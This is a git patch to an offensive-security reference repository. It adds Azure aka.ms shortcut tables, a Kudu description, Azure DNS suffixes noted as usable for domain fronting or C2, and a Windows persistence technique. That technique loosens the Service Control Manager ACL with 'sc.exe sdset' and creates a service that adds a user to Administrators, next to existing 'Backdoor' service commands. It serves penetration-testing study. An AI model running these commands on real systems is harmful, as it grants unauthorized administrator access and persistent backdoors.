From bf3c6c48753f26d55773b5fde9c167b7fe915cfb Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 14 Sep 2024 23:55:18 +0200 Subject: [PATCH] aka.ms + Kudu + Azure Services + Service Security Descriptor --- docs/cloud/azure/aka-ms.md | 103 ++++++++++++++++++ docs/cloud/azure/azure-access-and-token.md | 4 +- docs/cloud/azure/azure-ad-connect.md | 2 +- docs/cloud/azure/azure-requirements.md | 1 - docs/cloud/azure/azure-services-web-apps.md | 21 ++++ .../cloud/azure/azure-services-web-domains.md | 40 +++++++ .../persistence/windows-persistence.md | 51 ++++++++- 7 files changed, 214 insertions(+), 8 deletions(-) create mode 100644 docs/cloud/azure/aka-ms.md create mode 100644 docs/cloud/azure/azure-services-web-domains.md diff --git a/docs/cloud/azure/aka-ms.md b/docs/cloud/azure/aka-ms.md new file mode 100644 index 0000000..134c853 --- /dev/null +++ b/docs/cloud/azure/aka-ms.md @@ -0,0 +1,103 @@ +# aka.ms Shortcuts + +aka.ms is a URL shortening service used by Microsoft. It is commonly employed to create short, easily shareable links that redirect users to longer or more complex URLs, typically related to Microsoft services, products, or resources. + +## Azure Active Directory - Admins + +|aka.ms|Command|Portal Blade| +|-----|----|---| +|[aka.ms/ad/ca](https://aka.ms/ad/ca)|ca|Conditional Access| +|[aka.ms/ad/cawhatif](https://aka.ms/ad/cawhatif)|cawhatif|Conditional Access What If| +|[aka.ms/ad/pim](https://aka.ms/ad/pim)|pim|Privileged Identity Management| +|[aka.ms/ad/users](https://aka.ms/ad/users)|users|Users| +|[aka.ms/ad/groups](https://aka.ms/ad/groups)|groups|Groups| +|[aka.ms/ad/devices](https://aka.ms/ad/devices)|devices|Devices| +|[aka.ms/ad/apps](https://aka.ms/ad/apps)|apps|Enterprise Applications| +|[aka.ms/ad/appreg](https://aka.ms/ad/appreg)|appreg|Application Registrations| +|[aka.ms/ad/auth](https://aka.ms/ad/auth)|auth|Authentication Methods Policies| +|[aka.ms/ad/legacymfa](https://aka.ms/ad/legacymfa)|legacymfa|Legacy MFA| +|[aka.ms/ad/guests](https://aka.ms/ad/guests)|guests|Guest Access Settings| +|[aka.ms/ad/logs](https://aka.ms/ad/logs)|logs|Sign in Logs| +|[aka.ms/ad/xtap](https://aka.ms/ad/xtap)|xtap|Cross Tenant Access Settings| +|[aka.ms/ad/roles](https://aka.ms/ad/roles)|roles|Azure AD Roles| +|[aka.ms/ad/sspr](https://aka.ms/ad/sspr)|sspr|Password Reset| +|[aka.ms/ad/security](https://aka.ms/ad/security)|security|Security| +|[aka.ms/ad/mfaunblock](https://aka.ms/ad/mfaunblock)|mfaunblock|MFA Unblock| +|[aka.ms/ad/reviews](https://aka.ms/ad/reviews)|reviews|Access Reviews| +|[aka.ms/ad/score](https://aka.ms/ad/score)|score|Secure Score| +|[aka.ms/ad/license](https://aka.ms/ad/license)|license|Licenses| +|[aka.ms/ad/synclog](https://aka.ms/ad/synclog)|synclog|AAD Connect Sync Errors| +|[aka.ms/ad/adfslog](https://aka.ms/ad/adfslog)|adfslog|ADFS Log| +|[aka.ms/ad/consent](https://aka.ms/ad/consent)|consent|Consents and Permissions| +|[aka.ms/ad/support](https://aka.ms/ad/support)|support|Support| +|[aka.ms/ad/list](https://aka.ms/ad/list)|list|List all these shortcuts| + +## Microsoft Admin Portals + +|aka.ms|Command|Page| +|-----|----|---| +|[aka.ms/admin](https://aka.ms/admin)|admin|[M365 Admin Portal](https://admin.microsoft.com)| +|[aka.ms/azad](https://aka.ms/azad)|azad|[Azure AD Portal](https://portal.azure.com)| +|[aka.ms/ge](https://aka.ms/ge)|ge|[Graph Explorer](https://developer.microsoft.com/graph/graph-explorer)| +|[aka.ms/intune](https://aka.ms/intune)|intune|[Intune](https://endpoint.microsoft.com)| +|[aka.ms/ppac](https://aka.ms/ppac)|ppac|[Power Platform](https://admin.powerplatform.microsoft.com/)| + +## Microsoft Intune Portals + +|aka.ms|Command|Page| +|-----|----|---| +|[aka.ms/in](https://aka.ms/in)|in|Intune admin center| +|[aka.ms/intuneshd](https://aka.ms/intuneshd)|intuneshd|Intune service health| +|[aka.ms/intunesupport](https://aka.ms/intunesupport)|support|Get Intune Support| +|[aka.ms/enrollmymac](https://aka.ms/enrollmymac)|enrollmymac|Download the Intune Company Portal for Macs| + +## Microsoft 365 Defender + +|aka.ms|Command|Portal Blade| +|-----|----|---| +|[aka.ms/de](https://aka.ms/de)|de|Microsoft 365 Defender| +|[aka.ms/de/incidents](https://aka.ms/de/incidents)|incidents|Incidents| +|[aka.ms/de/hunting](https://aka.ms/de/hunting)|hunting|Hunting| +|[aka.ms/de/actions](https://aka.ms/de/actions)|actions|Action Center| +|[aka.ms/de/explorer](https://aka.ms/de/explorer)|explorer|Explorer| + +## Microsoft User Portals + +|aka.ms|Page| +|-----|---| +|[aka.ms/sspr](https://aka.ms/sspr)|Self Service Password Reset| +|[aka.ms/mysecurity](https://aka.ms/mysecurity)|My Security| +|[aka.ms/myapps](https://aka.ms/myapps)|My Apps| +|[aka.ms/my-account](https://aka.ms/my-account)|My Account| +|[aka.ms/my-groups](https://aka.ms/my-groups)|My Groups| +|[aka.ms/my-access](https://aka.ms/my-access)|My Access Packages| +|[aka.ms/mystaff](https://aka.ms/mystaff)|My Access Packages| +|[aka.ms/mfasetup](https://aka.ms/mfasetup)|Alternative for My Security| + +## Identity Protection + +|aka.ms|Page| +|-----|---| +|[aka.ms/identityprotection](https://aka.ms/identityprotection)|Identity Protection| + +## Winget (Windows Package Manager) + +|aka.ms|Page| +|-----|---| +|[aka.ms/getwinget](https://aka.ms/getwinget)|Get Winget Installer| +|[aka.ms/winget-docs](https://aka.ms/winget-docs)|Winget Documentation| +|[aka.ms/winget](https://aka.ms/winget)|Winget Packages (Github Repo)| + +## Miscellaneous + +|aka.ms|Page| +|-----|---| +|[aka.ms/entradeprecations](https://aka.ms/entradeprecations)|Entra/Azure AD related retirements/deprecations| +|[aka.ms/entratemplates](https://aka.ms/entratemplates)|Email templates & posters to roll out Azure Active Directory features| +|[aka.ms/Fileshare Migration](https://aka.ms/odsp-mm-fs)|Fileshare Migration Portal| + + +## References + +* [microsoft/aka - GitHub - microsoftopensource](https://github.com/microsoft/aka) +* [levid0s/AzurePortals - levid0s - 2019](https://github.com/levid0s/AzurePortals) \ No newline at end of file diff --git a/docs/cloud/azure/azure-access-and-token.md b/docs/cloud/azure/azure-access-and-token.md index 30b9cca..1cd3315 100644 --- a/docs/cloud/azure/azure-access-and-token.md +++ b/docs/cloud/azure/azure-access-and-token.md @@ -1,4 +1,4 @@ -# Azure AD - Tokens +# Azure AD - Access and Tokens ## Connection @@ -322,7 +322,7 @@ MimiKatz (version 2.2.0 and above) can be used to attack (hybrid) Azure AD joine * Request a nonce from AAD: `roadrecon auth --prt-init -t ` * Use [dirkjanm/ROADtoken](https://github.com/dirkjanm/ROADtoken) or [wotwot563/aad_prt_bof](https://github.com/wotwot563/aad_prt_bof) to initiate a new PRT request. * `roadrecon auth --prt-cookie --tokens-stdout --debug` or `roadtx gettoken --prt-cookie ` -* Then browse to [login.microsoftonline.com](login.microsoftonline.com) with a cookie `x-ms-RefreshTokenCredential:` +* Then browse to [login.microsoftonline.com](https://login.microsoftonline.com) with a cookie `x-ms-RefreshTokenCredential:` ```powershell Name: x-ms-RefreshTokenCredential Value: diff --git a/docs/cloud/azure/azure-ad-connect.md b/docs/cloud/azure/azure-ad-connect.md index 66260f2..e638e39 100644 --- a/docs/cloud/azure/azure-ad-connect.md +++ b/docs/cloud/azure/azure-ad-connect.md @@ -1,4 +1,4 @@ -# Azure AD - Azure AD Connect +# Azure AD - AD Connect and Cloud Sync | Active Directory | Azure AD | |-----------------------------------|-------------------| diff --git a/docs/cloud/azure/azure-requirements.md b/docs/cloud/azure/azure-requirements.md index 1753cf6..2185022 100644 --- a/docs/cloud/azure/azure-requirements.md +++ b/docs/cloud/azure/azure-requirements.md @@ -30,7 +30,6 @@ Subscriptions: * **Core Domain**: The initial domain name .onmicrosoft.com is the core domain. It is possible to define custom domain names too. - ## References * [Az - Permissions for a Pentest - HackTricks](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-permissions-for-a-pentest) diff --git a/docs/cloud/azure/azure-services-web-apps.md b/docs/cloud/azure/azure-services-web-apps.md index 556b04a..68fc1fd 100644 --- a/docs/cloud/azure/azure-services-web-apps.md +++ b/docs/cloud/azure/azure-services-web-apps.md @@ -6,6 +6,7 @@ az webapp list ``` + ## Execute Commands ```ps1 @@ -19,6 +20,7 @@ Invoke-AzureRMWebAppShellCommand ` -Command "whoami" ``` + ## SSH Connection First check if the SSH over HTTP connection is enabled: `(curl https://${appName}?app.scm.azurewebsites.net/webssh/host).statuscode` @@ -29,6 +31,25 @@ az webapp create-remote-connection --subscription --resource-g ``` +## Kudu + +In Azure App Service, Kudu is the advanced management and deployment tool used for various operations such as continuous integration, troubleshooting, and diagnostic tasks for your web applications. It provides a set of utilities and features for managing your app’s environment, including access to application settings, log streams, and deployment management. + +You can access this Kudu app at the following URLs: + +* App not in the Isolated tier: `https://.scm.azurewebsites.net` +* Internet-facing app in the Isolated tier (App Service Environment): `https://.scm..p.azurewebsites.net` +* Internal app in the Isolated tier (App Service Environment for internal load balancing): `https://.scm..appserviceenvironment.net` + +Key Features of Kudu in App Service: + +* **Web-Based Console**: Provides a command-line interface (CLI) to execute commands directly on the App Service environment. +* **File Explorer**: Lets you view and manage files in your app’s environment. +* **Environment Diagnostics**: Offers insights into the environment variables, app settings, and detailed diagnostic logs. +* **Process Explorer**: Allows you to monitor and manage running processes in your app’s environment. +* **Access to Logs**: Easily view, download, and stream logs for debugging and troubleshooting. + + ## References * [Training - Attacking and Defending Azure Lab - Altered Security](https://www.alteredsecurity.com/azureadlab) \ No newline at end of file diff --git a/docs/cloud/azure/azure-services-web-domains.md b/docs/cloud/azure/azure-services-web-domains.md new file mode 100644 index 0000000..f5317ad --- /dev/null +++ b/docs/cloud/azure/azure-services-web-domains.md @@ -0,0 +1,40 @@ +# Azure Services - DNS Suffix + +## DNS table + +Many Azure services generate custom endpoints with a suffix such as `.cloudapp.azure.com`, `.windows.net`. Below is a table of common services and their associated DNS suffixes. + +These services can also be leveraged for domain fronting or communication with an external C2 server when they are whitelisted by the proxy or the firewall rules. + +| Service | Domain | +| --- | --- | +| Analysis Services Suffix | .asazure.windows.net | +| API Management Suffix | .azure-api.net | +| App Services Suffix | .azurewebsites.net | +| Automation Suffix | .azure-automation.net | +| Batch Suffix | .batch.azure.com | +| Blob Endpoint Suffix | .blob.core.windows.net | +| CDN Suffix | .azureedge.net | +| Data Lake Analytics Catalog Suffix | .azuredatalakeanalytics.net | +| Data Lake Store Suffix | .azuredatalakestore.net | +| DocumentDB/CosmosDB Suffix | .documents.azure.com | +| Event Hubs Suffix | .servicesbus.windows.net | +| File Endpoint Suffix | .file.core.windows.net | +| FrontDoor Suffix | .azurefd.net | +| IoT Hub Suffix | .azure-devices.net | +| Key Vault Suffix | .vault.azure.net | +| Logic App Suffix | .azurewebsites.net | +| Queue Endpoint Suffix | .queue.core.windows.net | +| Redis Cache Suffix | .redis.cache.windows.net | +| Service Bus Suffix | .servicesbus.windows.net | +| Service Fabric Suffix | .cloudapp.azure.com | +| SQL Database Suffix | .database.windows.net | +| Storage Endpoint Suffix | .core.windows.net | +| Table Endpoint Suffix | .table.core.windows.net | +| Traffic Manager Suffix | .trafficmanager.net | +| Web Application Gateway Suffix | .cloudapp.azure.com | + + +## References + +* [Azure services URLs and IP addresses for firewall or proxy whitelisting - Daniel Neumann - 20. December 2016](https://www.danielstechblog.io/azure-services-urls-and-ip-addresses-for-firewall-or-proxy-whitelisting/) \ No newline at end of file diff --git a/docs/redteam/persistence/windows-persistence.md b/docs/redteam/persistence/windows-persistence.md index 4e4c733..0a31a9b 100644 --- a/docs/redteam/persistence/windows-persistence.md +++ b/docs/redteam/persistence/windows-persistence.md @@ -19,10 +19,11 @@ * [Windows Service](#windows-service) * [Elevated](#elevated) * [Registry HKLM](#registry-hklm) - * [Winlogon Helper DLL](#) - * [GlobalFlag](#) + * [Winlogon Helper DLL](#winlogon-helper-dll) + * [GlobalFlag](#globalflag) * [Startup Elevated](#startup-elevated) * [Services Elevated](#services-elevated) + * [Service Security Descriptor](#servicesecuritydescriptor) * [Scheduled Tasks Elevated](#scheduled-tasks-elevated) * [Binary Replacement](#binary-replacement) * [Binary Replacement on Windows XP+](#binary-replacement-on-windows-xp) @@ -321,7 +322,7 @@ Create a service that will start automatically or on-demand. ```powershell # Powershell New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here." -StartupType Automatic -sc start pentestlab +sc start Backdoor # SharPersist SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c backdoor.exe" -n "Backdoor" -m add @@ -331,6 +332,46 @@ sc create Backdoor binpath= "cmd.exe /k C:\temp\backdoor.exe" start="auto" obj=" sc start Backdoor ``` + +### ServiceSecurityDescriptor + +Allow any arbitrary non-administrative user to have full SYSTEM permissions on a machine persistently by feeding an overly permissive ACL to the service control manager with sdset. + +**Exploit**: + +```ps1 +sc.exe sdset +``` + +The following command grants full control (`Key Access`) over the Service Control Manager to all users (represented by `WD`, which stands for "World"). In other words, it allows any user to start, stop, modify, or control services through the Service Control Manager, which can be a security risk as it opens service management to everyone on the system. + +```ps1 +sc.exe sdset scmanager D:(A;;KA;;;WD) +``` + +* `sc.exe`: The Service Control (sc) command is a Windows utility used for managing services. +* `sdset`: This option sets a Security Descriptor (SD) for a service or the Service Control Manager itself. A security descriptor defines permissions and access rights to system resources. +* `scmanager`: This is the target, referring to the Service Control Manager, which manages the services in the system. + +The `ServiceSecurityDescriptor` is defined using the Service Descriptor Definition Language (SDDL). + +List the permissions for `scmanager` + +```ps1 +sc.exe sdshow scmanager +``` + +Alternatively, you can use [zacateras/sddl-parser](https://github.com/zacateras/sddl-parser) to understand the Security Descriptor Definition Language (SDDL), e.g: `./Sddl.Parser.Console.exe "O:BAG:BAD:(A;CI;CCDCRP;;;NS)"`. + +Abuse the weaken configuration to create a service that grants administrator privilege to a custom user `user_basic`. + +```ps1 +sc create LPE displayName= "LPE" binPath= "C:\Windows\System32\net.exe localgroup Administrators user_basic /add" start= auto +``` + +Then you need to wait for a reboot for the service to automatically start and grant the user with elevated privilege or any persistence mechanism you specified in the `binPath`. + + ### Scheduled Tasks Elevated Scheduled Task to run as SYSTEM, everyday at 9am or on a specific day. @@ -579,4 +620,6 @@ Set-DomainObject -Identity -Set @{"ms-mcs-admpwdexpirationtime" * [Persistence – Registry Run Keys - @netbiosX](https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/) * [Golden Certificate - NOVEMBER 15, 2021](https://pentestlab.blog/2021/11/15/golden-certificate/) * [Beware of the Shadowbunny - Using virtual machines to persist and evade detections - Sep 23, 2020 - wunderwuzzi](https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/) -* [Persistence via WMI Event Subscription - Elastic Security Solution](https://www.elastic.co/guide/en/security/current/persistence-via-wmi-event-subscription.html) \ No newline at end of file +* [Persistence via WMI Event Subscription - Elastic Security Solution](https://www.elastic.co/guide/en/security/current/persistence-via-wmi-event-subscription.html) +* [PrivEsc: Abusing the Service Control Manager for Stealthy & Persistent LPE - 0xv1n - 2023-02-27](https://0xv1n.github.io/posts/scmanager/) +* [Sc sdset - Microsoft - 08/31/2016](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc742037(v=ws.11)) \ No newline at end of file